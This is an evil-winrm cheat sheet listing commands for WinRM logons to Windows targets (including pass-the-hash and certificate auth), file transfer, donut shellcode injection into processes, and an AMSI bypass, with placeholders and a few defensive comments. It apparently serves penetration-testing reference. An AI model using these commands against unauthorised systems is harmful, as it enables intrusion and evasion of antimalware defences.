Evil-winrm
# evil-winrm cheat sheet: command forms for opening a WinRM session to a
# Windows target, plus the helper commands available inside that session.
# Angle-bracket tokens (<IP address>, <username>, ...) are placeholders to be
# substituted, not shell syntax — this file is a reference, not a runnable script.
# NOTE(defense): every session variant below authenticates through WinRM, so the
# target's Security log records the logon and, where PowerShell script-block
# logging is enabled, what the session executes is logged as well.
# Create WinRM session to target:
evil-winrm -i <IP address> -u '<username>' -p '<password>'
# Create WinRM session to target with NT hash
# (NTLM accepts the hash directly, so no cleartext password is needed):
evil-winrm -i <IP address> -u '<username>' -H '<NT hash>'
# Create WinRM session to target with SSL (-S selects the HTTPS listener;
# without it the plain-HTTP listener is used — confirm ports with evil-winrm --help):
evil-winrm -i <IP address> -u '<username>' -p '<password>' -S
# Create WinRM session to target with PFX certificate.
# First, extract the public certificate:
openssl pkcs12 -in <pfx file> -clcerts -nokeys -out public-cert.pem
# Then, extract the private key (-nodes writes it unencrypted, so keep
# priv-key.pem readable only by you and remove it when it is no longer needed):
openssl pkcs12 -in <pfx file> -nocerts -out priv-key.pem -nodes
# Finally, establish session with those files (certificate auth implies SSL):
evil-winrm -i <IP address> -c public-cert.pem -k priv-key.pem -S
# Create WinRM session to target, specifying path
# for powershell scripts on attack box:
evil-winrm -i <IP address> -u '<username>' -p '<password>' -s <scripts path>
# Create WinRM session to target, specifying path
# for binaries on attack box:
evil-winrm -i <IP address> -u '<username>' -p '<password>' -e <binaries path>
# Inside evil-winrm session, upload file on target:
upload <file path>
# Inside evil-winrm session, download file from target:
download <file path>
# Show evil-winrm session menu, with loaded ps1 files:
menu
# Inside evil-winrm session, load powershell files
# from path specified with -s flag (type the script's filename as a command):
<.ps1 file>
# Inside evil-winrm session, invoke binary from path
# specified with -e flag:
Invoke-Binary <binary path> <params>
# Inside evil-winrm session, inject x64 payloads generated
# by donut into the given process:
Donut-Loader -process_id <PID> -donutfile <donut file>
# Donut payload can be generated with donut-maker,
# found here: https://github.com/Hackplayers/Salsa-tools/blob/master/Donut-Maker/donut-maker.py
# It requires the donut-shellcode package: python3 -m pip install --user donut-shellcode
donut-maker.py -i payload.exe
# Alternatively, find process ID automatically
# (Get-Process is PowerShell, evaluated inside the session):
Donut-Loader -process_id (get-process <process name e.g. notepad>).id -donutfile <donut file>
# Inside evil-winrm session, attempt to bypass AMSI (Antimalware Scan Interface)
# using evil-winrm's built-in helper:
Bypass-4MSI